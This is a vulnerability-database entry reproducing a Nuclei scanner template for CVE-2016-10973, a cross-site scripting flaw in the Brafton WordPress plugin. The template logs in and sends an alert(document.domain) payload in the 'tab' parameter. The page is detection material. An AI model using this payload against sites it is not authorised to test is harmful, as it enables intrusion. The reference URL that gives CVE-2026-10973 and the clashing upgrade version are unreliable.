Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-10973
HistoryJun 25, 2023 - 11:43 a.m.

Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting

2023-06-2511:43:30
ProjectDiscovery
github.com
3
cross-site scripting
brafton
wordpress
vulnerability
data theft
session hijacking
website defacement
wp-plugin
cve-2016-10973
xss
upgrade
version 3.4.9
authenticated

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

55.1%

The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.
id: CVE-2016-10973

info:
  name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd
    - https://nvd.nist.gov/vuln/detail/CVE-2026-10973
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-10973
    cwe-id: CWE-79
    epss-score: 0.00177
    epss-percentile: 0.54797
    cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: brafton
    product: brafton
    framework: wordpress
  tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "tab = alert(document.domain);")'
          - 'contains(body_2, "Brafton Article Loader")'
        condition: and
# digest: 4a0a004730450220794dbf512a1810009e7cd3e7bbb640cd76c0dc11d6c8f18bd09c931247485bc0022100e47ff8d6c0f657e433480f8453d0ef5bdb478696a22d503a10f7fb8a3976a91a:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

55.1%

Related for NUCLEI:CVE-2016-10973